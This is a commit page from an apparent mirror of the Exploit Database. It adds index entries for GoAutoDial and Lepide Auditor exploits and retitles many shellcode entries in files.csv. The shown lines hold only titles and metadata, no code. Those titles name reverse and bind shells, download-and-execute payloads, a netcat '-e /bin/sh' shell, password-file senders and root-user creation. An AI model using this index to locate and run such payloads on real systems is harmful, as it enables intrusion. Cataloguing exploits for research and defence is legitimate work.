bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-07-06

Browse source 
3 new exploits

GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)
Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution

(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters
(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode

(Generator) - Alphanumeric Shellcode Encoder/Decoder
(Generator) - Alphanumeric Shellcode (Encoder/Decoder)

Win32 - Multi-Format Shellcode Encoding Tool (Generator)
Win32 - Multi-Format Encoding Tool Shellcode (Generator)

Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)
Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)

Linux/x86 - Listens for Shellcode on 5555/TCP + Jumps to it (83 bytes)
Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)

Linux/x86 - Shellcode Obfuscator
Linux/x86 - Shellcode Obfuscator (Generator)

Linux/x86 - Connectback Shellcode 127.0.0.1:31337/TCP (74 bytes)
Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)

OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)
OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)

Solaris/SPARC - connect-bac Shellcode k (204 bytes)
Solaris/SPARC - connect-back Shellcode (204 bytes)

Win32 - Download + Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)
Win32 - Download + Execute Shellcode (Browsers Edition) (Generator)  (275+ bytes)

Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)

Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)
Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes)

Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)
Safari 4.0.5 - 5.0.0 (Windows XP /  7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode

ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic  Shellcode (Generator)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)

Win32 - Shellcode Checksum Routine (18 bytes)
Win32 - Checksum Routine Shellcode (18 bytes)

Linux/MIPS - XOR Shellcode Encoder (60 bytes)
Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)
Linux/x86 - custom execve-Shellcode Encoder/Decoder
Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)
Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)
Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)
Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)

Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce
Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode

Linux/x86 - Bind Netcat Shellcode with Port (44/52 bytes)
Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)

Linux/x86 - Reverse TCP Shellcode (67 bytes)
This commit is contained in:
Offensive Security 2017-07-06 05:01:24 +00:00
parent c89aecde1c
commit 9a0992d704
4 changed files with 454 additions and 22 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

47
files.csv
View file

@ -15681,6 +15681,8 @@ id,file,description,date,author,platform,type,port
42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution",2017-07-05,mr_me,php,remote,7778
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15723,11 +15725,11 @@ id,file,description,date,author,platform,type,port
13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Bind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0
13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0
13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode Encoder/Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0
13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0
13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Shellcode Encoding Tool (Generator)",2005-12-16,Skylined,generator,shellcode,0
13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
@ -15744,9 +15746,9 @@ id,file,description,date,author,platform,type,port
13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens for Shellcode on 5555/TCP + Jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
@ -15765,7 +15767,7 @@ id,file,description,date,author,platform,type,port
13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0
13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator",2008-12-09,sm4x,generator,shellcode,0
13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator (Generator)",2008-12-09,sm4x,generator,shellcode,0
13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Connectback 54321/UDP Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
@ -15830,7 +15832,7 @@ id,file,description,date,author,platform,type,port
13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connectback Shellcode 127.0.0.1:31337/TCP (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@ -15914,7 +15916,7 @@ id,file,description,date,author,platform,type,port
13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0
13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 Bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0
13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - Bind 6969/TCP Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0
13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0
13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0
13478,platforms/osx_ppc/shellcode/13478.c,"OSX/PPC - sync()_ reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
13480,platforms/osx_ppc/shellcode/13480.c,"OSX/PPC - Add user _r00t_ Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
@ -15933,7 +15935,7 @@ id,file,description,date,author,platform,type,port
13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind 6666/TCP Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0
13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind 6789/TCP Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-bac Shellcode k (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-back Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
@ -15951,7 +15953,7 @@ id,file,description,date,author,platform,type,port
13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback + receive + save + execute Shellcode",2008-08-25,loco,win_x86,shellcode,0
13515,platforms/generator/shellcode/13515.pl,"Win32 - Download + Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",generator,shellcode,0
13515,platforms/generator/shellcode/13515.pl,"Win32 - Download + Execute Shellcode (Browsers Edition) (Generator) (275+ bytes)",2008-03-14,"YAG KOHHA",generator,shellcode,0
13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download + Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0
13517,platforms/win_x86/shellcode/13517.asm,"Win32 - Download + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
13518,platforms/win_x86/shellcode/13518.c,"Win32/NT/XP - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0
@ -15960,11 +15962,11 @@ id,file,description,date,author,platform,type,port
13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0
13522,platforms/win_x86/shellcode/13522.c,"Win32 - Download + Exec Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0
13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0
13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0
13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0
13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0
13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)",2004-10-25,lion,win_x86,shellcode,0
13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes)",2004-10-25,lion,win_x86,shellcode,0
13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File + Exec Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0
13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download + Exec Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind 58821/TCP Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
@ -16072,10 +16074,10 @@ id,file,description,date,author,platform,type,port
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0
14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 - 5.0.0 (Windows XP / 7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0
14234,platforms/linux/shellcode/14234.c,"Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0
14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0
14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0
@ -16083,7 +16085,7 @@ id,file,description,date,author,platform,type,port
14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bind Shell 2525/TCP Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14873,platforms/win_x86/shellcode/14873.asm,"Win32 - Shellcode Checksum Routine (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0
14873,platforms/win_x86/shellcode/14873.asm,"Win32 - Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0
14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0
15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
@ -16113,7 +16115,7 @@ id,file,description,date,author,platform,type,port
17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0
17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Shellcode Encoder (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0
17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0
18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
@ -16174,9 +16176,9 @@ id,file,description,date,author,platform,type,port
36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve-Shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0
36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0
36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0
36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
@ -16214,7 +16216,7 @@ id,file,description,date,author,platform,type,port
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind 31173/TCP Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0
38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0
38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0
38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)",2015-12-13,B3mB4m,generator,shellcode,0
39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind 4444/TCP Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
@ -16259,7 +16261,7 @@ id,file,description,date,author,platform,type,port
39914,platforms/win_x86/shellcode/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
39979,platforms/windows/shellcode/39979.c,"Windows XP < 10 - Download + Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind NetCat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
@ -16272,7 +16274,7 @@ id,file,description,date,author,platform,type,port
40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat Shellcode with Port (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
